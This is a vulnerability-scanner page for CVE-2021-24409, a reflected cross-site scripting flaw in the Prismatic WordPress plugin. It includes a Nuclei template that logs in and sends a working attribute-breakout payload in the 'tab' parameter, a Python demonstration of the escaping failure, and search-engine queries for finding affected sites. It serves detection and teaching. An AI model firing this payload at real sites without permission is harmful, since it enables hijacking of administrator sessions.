Prismatic < 2.8 - Cross-Site Scripting
ID: CVE-2021-24409
Severity: medium
Author: Harsh
Tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet
Description
The plugin does not escape the ‘tab’ GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator.
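To make the attribute-context failure in the description concrete, here is an added example that is not code from the Prismatic plugin or from the template: the settings-page markup and the function names are assumptions, while the ‘tab’ value is the one from the template's second request, URL-decoded. Fed into an HTML parser, the unescaped reflection yields extra `style` and `onanimationend` attributes on the tag, whereas attribute escaping (the role `esc_attr()` plays in WordPress) keeps the value confined to `href`.

```python
# Added example (not from the Prismatic plugin or the Nuclei template): the
# markup below is an assumed stand-in for a settings page that echoes the
# 'tab' GET parameter into an attribute without escaping it.
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# The 'tab' value from the template's second request, URL-decoded.
TAB_PAYLOAD = unquote_plus(
    "%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22"
)

EXPECTED_ATTRS = {"href", "class"}  # attributes the assumed markup legitimately carries


def render_tab_link(tab: str, escaped: bool) -> str:
    """Assumed markup: the current tab name is reflected into an href attribute.

    escaped=False mirrors the bug (value inserted verbatim); escaped=True applies
    attribute-context escaping, which is what WordPress's esc_attr() provides.
    """
    value = escape(tab, quote=True) if escaped else tab
    return f'<a href="options-general.php?page=prismatic&amp;tab={value}" class="nav-tab">General</a>'


class _AttrCollector(HTMLParser):
    """Records the attribute names the parser assigns to the <a> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs = dict(attrs)


def injected_attributes(tab: str, escaped: bool) -> set:
    """Attribute names that appear on the tag beyond the ones the markup defines.

    A non-empty result means the reflected value broke out of the href attribute.
    """
    parser = _AttrCollector()
    parser.feed(render_tab_link(tab, escaped))
    parser.close()
    return set(parser.attrs) - EXPECTED_ATTRS


if __name__ == "__main__":
    print("unescaped:", sorted(injected_attributes(TAB_PAYLOAD, escaped=False)))
    print("escaped:  ", sorted(injected_attributes(TAB_PAYLOAD, escaped=True)))
```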
YAML Source
id: CVE-2021-24409

info:
  name: Prismatic < 2.8 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
  remediation: Fixed in version 2.8
  reference:
    - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24409
    cwe-id: CWE-79
    epss-score: 0.00171
    epss-percentile: 0.54048
    cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugin-planet
    product: prismatic
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/prismatic
    fofa-query: body=/wp-content/plugins/prismatic
    publicwww-query: "/wp-content/plugins/prismatic"
  tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "Leave A Review?")'
          - 'contains(body_2, "onanimationend=alert(document.domain)")'
        condition: and
# digest: 490a0046304402201aab86ae39c91d22ff4694011a714816d05f3f1f1b8c245621b9b0dcd87f5a040220538a028e1a7514ce3dd49b72806e017457efbc4847e3f70eab77d80af34de167:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24409.yaml"